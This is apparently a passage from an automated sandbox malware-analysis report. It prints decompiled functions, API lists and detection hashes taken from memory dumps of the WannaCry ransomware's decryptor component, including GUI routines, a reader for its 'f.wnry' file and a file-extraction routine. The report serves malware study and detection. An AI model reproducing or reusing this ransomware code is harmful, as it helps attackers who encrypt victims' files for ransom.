                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #567$#324
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 784016053-3838179817
                                                      • Opcode ID: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction ID: 8222d1989983ac506c5d09346421d66fb4ae1402eeff5ebed15e971907ed65db
                                                      • Opcode Fuzzy Hash: 6530db1bbd0e405eb5314e304be7278bbea559453e8c1a2ce06ca27fee27d17e
                                                      • Instruction Fuzzy Hash: 430169B1244B42CBD310CF19C580BDAFBE4FB84750F90892EE1AA9B741C3B864458B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00404C40(intOrPtr __ecx, intOrPtr _a4) {
                                                      				char _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _t24;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413809);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t24;
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(0x89);
                                                      				_v16 = __ecx;
                                                      				L00412C92();
                                                      				_v12 = 0;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x68)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x64)) = 0x415a44;
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x70)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v12 = 3;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415ec8;
                                                      				L00412DA0();
                                                      				 *[fs:0x0] = _v24;
                                                      				return __ecx;
                                                      			}

                                                      APIs
                                                      • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
                                                      • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
                                                      • #860.MFC42(00421798), ref: 00404CAD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #324#540#860
                                                      • String ID: 0ZA$DZA
                                                      • API String ID: 1048258301-3838179817
                                                      • Opcode ID: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction ID: 18ed51ee5778a88a9d54698e5e0d11c9dbfb79b85878934ba46accb8ddaa74ae
                                                      • Opcode Fuzzy Hash: b0cfd1353d7ceadba60806c011dda0c8f49be3dfc720069eeb22ffbda53a051c
                                                      • Instruction Fuzzy Hash: 880169B1644B50DBD311DF09D605BAABBE4FBD1B24F004A1EF1928B790C7BC95488BDA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 78%
                                                      			E00408B40(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t23;
                                                      				int _t25;
                                                      				intOrPtr _t30;
                                                      				int _t38;
                                                      				int _t41;
                                                      				intOrPtr* _t43;
                                                      				int _t45;
                                                      				intOrPtr _t47;
                                                      				struct HDC__* _t50;
                                                      				intOrPtr _t52;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041407B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t52;
                                                      				_t47 = __ecx;
                                                      				_v20 = __ecx;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4166e0;
                                                      				_t23 =  *((intOrPtr*)(__ecx + 0x30));
                                                      				_t50 = 0;
                                                      				_v4 = 1;
                                                      				if(_t23 == 0) {
                                                      					 *((intOrPtr*)(__ecx + 8)) = 0;
                                                      					 *(__ecx + 4) = 0;
                                                      				} else {
                                                      					_t41 =  *(__ecx + 0x24);
                                                      					_t45 =  *(__ecx + 0x20);
                                                      					_t25 =  *((intOrPtr*)(__ecx + 0x2c)) - _t41;
                                                      					_t38 =  *((intOrPtr*)(__ecx + 0x28)) - _t45;
                                                      					_t30 =  *((intOrPtr*)(__ecx + 0x1c));
                                                      					if(__ecx != 0) {
                                                      						_t50 =  *(__ecx + 4);
                                                      					}
                                                      					BitBlt( *(_t30 + 4), _t45, _t41, _t38, _t25, _t50, _t45, _t41, 0xcc0020);
                                                      					_t23 =  *((intOrPtr*)(_t47 + 0x18));
                                                      					if(_t23 != 0) {
                                                      						_t23 =  *((intOrPtr*)(_t23 + 4));
                                                      						_push(_t23);
                                                      						_push( *((intOrPtr*)(_t47 + 4)));
                                                      						L00412E48();
                                                      					} else {
                                                      						_push(_t23);
                                                      						_push( *((intOrPtr*)(_t47 + 4)));
                                                      						L00412E48();
                                                      					}
                                                      				}
                                                      				_t43 = _t47 + 0x10;
                                                      				_v16 = _t43;
                                                      				 *_t43 = 0x415c00;
                                                      				_v4 = 2;
                                                      				L00412D52();
                                                      				 *_t43 = 0x415bec;
                                                      				_v4 = 0xffffffff;
                                                      				L00412E3C();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                      • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
                                                      • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
                                                      • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
                                                      • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5785$#2414#640
                                                      • String ID:
                                                      • API String ID: 2719443296-0
                                                      • Opcode ID: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction ID: 86c9330ab4234590f1f3c164cda9a19739b95e23c8a4d3600225c259667158ab
                                                      • Opcode Fuzzy Hash: 455b206eaea57f198628315411046c596a923de9ec41dd3bd07dbbe9fd6cacce
                                                      • Instruction Fuzzy Hash: E1215CB5200B419FC324DF1ACA44A67FBE8EB88710F008A1EF59697781D7B8F8458B65
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00404530(void* __ecx) {
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				struct HDC__* _v32;
                                                      				void* _v36;
                                                      				struct tagSIZE _v48;
                                                      				void* _v56;
                                                      				intOrPtr _v60;
                                                      				intOrPtr _v64;
                                                      				int _t21;
                                                      				void* _t22;
                                                      				intOrPtr _t41;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004137C8);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t41;
                                                      				_t21 =  *((intOrPtr*)(__ecx + 0x5a));
                                                      				if(_t21 == 0) {
                                                      					_t21 =  *((intOrPtr*)(__ecx + 0x58));
                                                      					if(_t21 != 0) {
                                                      						_push(__ecx);
                                                      						L00412DEE();
                                                      						_t22 = __ecx + 0x48;
                                                      						_push(_t22);
                                                      						_v8 = 0;
                                                      						L00412DCA();
                                                      						_t21 = GetTextExtentPoint32A(_v32,  *(__ecx + 0x40),  *( *(__ecx + 0x40) - 8),  &_v48);
                                                      						 *((intOrPtr*)(__ecx + 0x50)) = _v64;
                                                      						_push(_t22);
                                                      						 *((intOrPtr*)(__ecx + 0x54)) = _v60;
                                                      						L00412DCA();
                                                      						 *((char*)(__ecx + 0x5a)) = 1;
                                                      						_v32 = 0xffffffff;
                                                      						L00412DE8();
                                                      					}
                                                      				}
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t21;
                                                      			}

                                                      APIs
                                                      • #289.MFC42 ref: 0040455F
                                                      • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                      • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                      • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                      • #613.MFC42 ref: 004045BB
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #5789$#289#613ExtentPoint32Text
                                                      • String ID:
                                                      • API String ID: 888490064-0
                                                      • Opcode ID: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction ID: e6b376e8f5faa3704f84febb4d8b873e9abde4cd399f019e979504a664a0483f
                                                      • Opcode Fuzzy Hash: a47064995aa8a6f4e8062305d7bd768f80382afea7fbb3e7ed5e4407e76e675d
                                                      • Instruction Fuzzy Hash: C8119DB5108780AFC310DF18D980B97BBE8EB88714F044A1DF49293681C7B8A845CB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E00406CF0(void* __ecx, intOrPtr _a4) {
                                                      				int _v12;
                                                      				intOrPtr _v20;
                                                      				void* _v28;
                                                      				char _v36;
                                                      				intOrPtr _v40;
                                                      				void* _v48;
                                                      				struct HWND__* _t16;
                                                      				void* _t21;
                                                      				void* _t34;
                                                      				intOrPtr _t36;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413E78);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t36;
                                                      				_t34 = __ecx;
                                                      				_t16 = __ecx + 0x4c0;
                                                      				if(_t16 != 0) {
                                                      					_t16 =  *(_t16 + 0x20);
                                                      				}
                                                      				SendMessageA(_t16, 0x445, 0, 0x4000000);
                                                      				_push(0);
                                                      				_push(_a4);
                                                      				L00412F44();
                                                      				_v12 = 0;
                                                      				_v48 =  &_v36;
                                                      				_v40 = E00406DA0;
                                                      				SendMessageA( *(_t34 + 0x4e0), 0x449, 2,  &_v48);
                                                      				L00412F3E();
                                                      				_t21 = E00406DC0(_t34);
                                                      				_v12 = 0xffffffff;
                                                      				L00412F38();
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t21;
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
                                                      • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,767B20C0), ref: 00406D39
                                                      • SendMessageA.USER32 ref: 00406D69
                                                      • #1979.MFC42 ref: 00406D6F
                                                      • #665.MFC42 ref: 00406D87
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1979#353#665
                                                      • String ID:
                                                      • API String ID: 3794212480-0
                                                      • Opcode ID: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction ID: 970bbd2b9484f858b006173e4a833a93101fbe0026f1fdcd253c6fb41473c1ec
                                                      • Opcode Fuzzy Hash: 3e8137c70926b1d8ee173e5193f7a8fccbc7f675bb9cd6243914618cf2aa9b36
                                                      • Instruction Fuzzy Hash: EA1170B1244701AFD210EF15C942F9BB7E4BF94B14F504A1EF156A72C0C7B8A905CB5A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00407DB0(void* __eflags) {
                                                      				intOrPtr _v4;
                                                      				intOrPtr _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v28;
                                                      				intOrPtr _v32;
                                                      				intOrPtr _v36;
                                                      				void* _v100;
                                                      				char _v196;
                                                      				void* _t14;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t22;
                                                      				void* _t23;
                                                      				intOrPtr* _t24;
                                                      				intOrPtr _t26;
                                                      				void* _t28;
                                                      
                                                      				 *[fs:0x0] = _t26;
                                                      				E00401000( &_v196, 0);
                                                      				_t24 = __imp__time;
                                                      				_v8 = 0;
                                                      				_t14 =  *_t24(0, _t23,  *[fs:0x0], E00413FA6, 0xffffffff);
                                                      				_t22 =  *0x4218a0; // 0x0
                                                      				_t28 = _t26 - 0xb8 + 4;
                                                      				if(_t14 - _t22 < 0x12c) {
                                                      					_v36 = 0;
                                                      				}
                                                      				_v32 = 0;
                                                      				L00412B72();
                                                      				_t16 = _v28;
                                                      				if(_t16 >= 0) {
                                                      					_t16 =  *_t24(0);
                                                      					_t28 = _t28 + 4;
                                                      					 *0x4218a0 = _t16;
                                                      				}
                                                      				 *0x4218a4 =  *0x4218a4 + 1;
                                                      				_v4 = 1;
                                                      				L00412C9E();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t16;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
                                                        • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
                                                      • time.MSVCRT ref: 00407DEA
                                                      • #2514.MFC42 ref: 00407E18
                                                      • time.MSVCRT ref: 00407E2A
                                                      • #765.MFC42 ref: 00407E49
                                                      • #641.MFC42 ref: 00407E5D
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: time$#2514#324#567#641#765
                                                      • String ID:
                                                      • API String ID: 3372871541-0
                                                      • Opcode ID: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction ID: 27345a9b2c1eb8b6f7bb2a745056f56b64ece2280f016bc8de7da71c9126f67a
                                                      • Opcode Fuzzy Hash: b8401119eccb86975bd1eb41a25b1802afd83000c8f18fd8393192857fb5272d
                                                      • Instruction Fuzzy Hash: 4C11AD70A097809FE320EF24CA41BDA77E0BB94714F40462EE589872D0EB786445CB97
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E004031A0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t15;
                                                      				intOrPtr* _t24;
                                                      				intOrPtr* _t25;
                                                      				intOrPtr _t30;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004135FF);
                                                      				_t15 =  *[fs:0x0];
                                                      				_push(_t15);
                                                      				 *[fs:0x0] = _t30;
                                                      				_v20 = __ecx;
                                                      				_v4 = 0;
                                                      				_t24 = __ecx + 0xec;
                                                      				_v16 = _t24;
                                                      				 *_t24 = 0x415c00;
                                                      				_v4 = 4;
                                                      				L00412D52();
                                                      				 *_t24 = 0x415bec;
                                                      				_t25 = __ecx + 0xe0;
                                                      				_v16 = _t25;
                                                      				 *_t25 = 0x415c00;
                                                      				_v4 = 5;
                                                      				L00412D52();
                                                      				 *_t25 = 0x415bec;
                                                      				_v4 = 1;
                                                      				L00412D4C();
                                                      				_v4 = 0;
                                                      				L00412D3A();
                                                      				_v4 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v12;
                                                      				return _t15;
                                                      			}

                                                      APIs
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
                                                      • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
                                                      • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
                                                      • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
                                                      • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414$#616#641#693
                                                      • String ID:
                                                      • API String ID: 1164084425-0
                                                      • Opcode ID: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction ID: e1576da2e33af18b213473c47bce756763974573e8f92b07b932385a5cbbc76a
                                                      • Opcode Fuzzy Hash: 34bc8b48edd82315a510377cde5f302579feb69e69f968417769f9718486fe20
                                                      • Instruction Fuzzy Hash: FF112774108B82CAC300DF19C1413CAFBE8AFA5714F54891FE0A6972A2D7F851998BE6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E00403AF0(void* __edi, void* __ebp) {
                                                      				int _v4;
                                                      				intOrPtr _v12;
                                                      				char _v1252;
                                                      				void _v2251;
                                                      				char _v2252;
                                                      				int _v2256;
                                                      				signed int _t43;
                                                      				signed char _t44;
                                                      				signed int _t52;
                                                      				signed int _t58;
                                                      				signed int _t75;
                                                      				signed int _t78;
                                                      				struct _IO_FILE* _t103;
                                                      				intOrPtr _t111;
                                                      				void* _t113;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041369B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t111;
                                                      				_t103 = fopen("f.wnry", "rt");
                                                      				_t113 = _t111 - 0x8c4 + 8;
                                                      				if(_t103 != 0) {
                                                      					E00401E90( &_v1252, __eflags);
                                                      					_v4 = 0;
                                                      					_t43 = E00402020( &_v1252, 0, E00403810, 0);
                                                      					__eflags = _t43;
                                                      					if(_t43 != 0) {
                                                      						_t44 =  *(_t103 + 0xc);
                                                      						_v2256 = 0;
                                                      						__eflags = _t44 & 0x00000010;
                                                      						if((_t44 & 0x00000010) == 0) {
                                                      							while(1) {
                                                      								_v2252 = 0;
                                                      								memset( &_v2251, 0, 0xf9 << 2);
                                                      								asm("stosw");
                                                      								asm("stosb");
                                                      								_t52 = fgets( &_v2252, 0x3e7, _t103);
                                                      								_t113 = _t113 + 0x18;
                                                      								__eflags = _t52;
                                                      								if(_t52 == 0) {
                                                      									break;
                                                      								}
                                                      								asm("repne scasb");
                                                      								_t75 = 0xbadbac;
                                                      								__eflags = 0xbadbac;
                                                      								if(0xbadbac != 0) {
                                                      									while(1) {
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t75 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                                      											goto L10;
                                                      										}
                                                      										L9:
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t78 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xa;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xa) {
                                                      											goto L10;
                                                      										}
                                                      										asm("repne scasb");
                                                      										__eflags =  !(_t78 | 0xffffffff) != 1;
                                                      										if( !(_t78 | 0xffffffff) != 1) {
                                                      											_t58 = E00402650( &_v1252,  &_v2252);
                                                      											__eflags = _t58;
                                                      											if(_t58 != 0) {
                                                      												_t29 =  &_v2256;
                                                      												 *_t29 = _v2256 + 1;
                                                      												__eflags =  *_t29;
                                                      											}
                                                      										}
                                                      										goto L14;
                                                      										L10:
                                                      										asm("repne scasb");
                                                      										_t75 =  !(_t78 | 0xffffffff) - 1;
                                                      										 *((char*)(_t113 + _t75 + 0x13)) = 0;
                                                      										asm("repne scasb");
                                                      										_t78 =  !(_t75 | 0xffffffff) - 1;
                                                      										__eflags =  *((char*)(_t113 + _t78 + 0x13)) - 0xd;
                                                      										if( *((char*)(_t113 + _t78 + 0x13)) == 0xd) {
                                                      											goto L10;
                                                      										}
                                                      										goto L9;
                                                      									}
                                                      								}
                                                      								L14:
                                                      								__eflags =  *(_t103 + 0xc) & 0x00000010;
                                                      								if(( *(_t103 + 0xc) & 0x00000010) == 0) {
                                                      									continue;
                                                      								}
                                                      								break;
                                                      							}
                                                      						}
                                                      						fclose(_t103);
                                                      						__eflags = _v2256;
                                                      						_t36 = _v2256 > 0;
                                                      						__eflags = _t36;
                                                      						_v4 = 0xffffffff;
                                                      						E00401F30( &_v1252);
                                                      						 *[fs:0x0] = _v12;
                                                      						return 0 | _t36;
                                                      					} else {
                                                      						_v4 = 0xffffffff;
                                                      						E00401F30( &_v1252);
                                                      						__eflags = 0;
                                                      						 *[fs:0x0] = _v12;
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					 *[fs:0x0] = _v12;
                                                      					return 0;
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: fopen
                                                      • String ID: f.wnry
                                                      • API String ID: 1432627528-2448388194
                                                      • Opcode ID: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction ID: 4eb239c0cb280e6f7c3b00bdc2b89ffa7a6027cf1f229c631d6900f059da94bf
                                                      • Opcode Fuzzy Hash: cf48eaa19fa84c87f31c2d63a6b3fa47abbd49c5c0666401f46844b5b3827a14
                                                      • Instruction Fuzzy Hash: CF410B311087415BE324DF3899417ABBBD4FB80321F144A3EF4E6B22C1DF789A088796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040B6A0(CHAR* _a4, CHAR* _a8, intOrPtr _a12) {
                                                      				char _v520;
                                                      				void _v816;
                                                      				struct _SECURITY_ATTRIBUTES* _v820;
                                                      				void* _t15;
                                                      				struct _SECURITY_ATTRIBUTES* _t37;
                                                      				CHAR* _t38;
                                                      				void* _t39;
                                                      				CHAR* _t40;
                                                      				struct _SECURITY_ATTRIBUTES** _t42;
                                                      				struct _SECURITY_ATTRIBUTES** _t44;
                                                      
                                                      				_t40 = _a4;
                                                      				CreateDirectoryA(_t40, 0);
                                                      				_t38 = _a8;
                                                      				_t15 = E00412920(_t38, _a12);
                                                      				_t28 = _t15;
                                                      				_t42 =  &(( &_v820)[2]);
                                                      				if(_t15 != 0) {
                                                      					_v820 = 0;
                                                      					memset( &_v816, 0, 0x4a << 2);
                                                      					E00412940(_t28, 0xffffffff,  &_v820);
                                                      					_t37 = _v820;
                                                      					_t44 =  &(_t42[6]);
                                                      					if(_t37 > 0) {
                                                      						_t39 = 0;
                                                      						if(_t37 > 0) {
                                                      							do {
                                                      								E00412940(_t28, _t39,  &_v820);
                                                      								sprintf( &_v520, "%s\\%s", _t40,  &_v816);
                                                      								E004129E0(_t28, _t39,  &_v520);
                                                      								_t44 =  &(_t44[0xa]);
                                                      								_t39 = _t39 + 1;
                                                      							} while (_t39 < _t37);
                                                      						}
                                                      						E00412A00(_t28);
                                                      						return 1;
                                                      					} else {
                                                      						return 0;
                                                      					}
                                                      				} else {
                                                      					DeleteFileA(_t38);
                                                      					return 0;
                                                      				}
                                                      			}














                                                      APIs
                                                      • CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                      • DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateDeleteDirectoryFile
                                                      • String ID: %s\%s
                                                      • API String ID: 3195586388-4073750446
